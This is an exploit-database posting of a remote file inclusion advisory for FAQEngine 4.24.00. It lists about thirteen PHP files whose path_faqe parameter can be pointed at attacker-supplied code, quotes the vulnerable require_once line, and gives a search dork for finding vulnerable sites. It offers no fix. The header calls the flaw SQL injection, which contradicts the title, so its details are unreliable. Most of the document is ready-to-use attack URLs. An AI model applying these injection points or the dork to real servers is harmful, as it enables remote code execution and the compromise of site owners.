Lucene search

K
zdtKaMtiEz1337DAY-ID-10661
HistoryJan 11, 2010 - 12:00 a.m.

FAQEngine 4.24.00 - Remote File Inclusion vulnerability

2010-01-1100:00:00
kaMtiEz
0day.today
11

Exploit for unknown platform in category web applications

=======================================================
FAQEngine 4.24.00 - Remote File Inclusion vulnerability
=======================================================

###################################################################################
 
[ Software Information ]
 
[+] Vendor : http://www.boesch-it.de/
[+] Download : http://www.boesch-it.de/sw/faqengine.php?lang=en
[+] version : 4.24.00 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Price : -           
[+] Location : INDONESIA - JOGJA
 
##################################################################################
 
 
[ HERE WE GO .. LIVE FROM JOGJA CITY ]
 
[ Vulnerable File ]
 
http://127.0.0.1/[kaMtiEz]/attachs.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/backup.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/badwords.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/categories.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/changepw.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/colorchooser.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/colorwheel.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/dbfiles.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/diraccess.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/faq.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/index.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/kb.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/stats.php?path_faqe=[INDONESIANCODER]
 
etc etc etc .. too much ..
 
[ ERROR IN ]
 
require_once($path_faqe."/includes/global.inc.php");
 
[ FIX ]
 
dunno .. :P~~



#  0day.today [2018-01-06]  #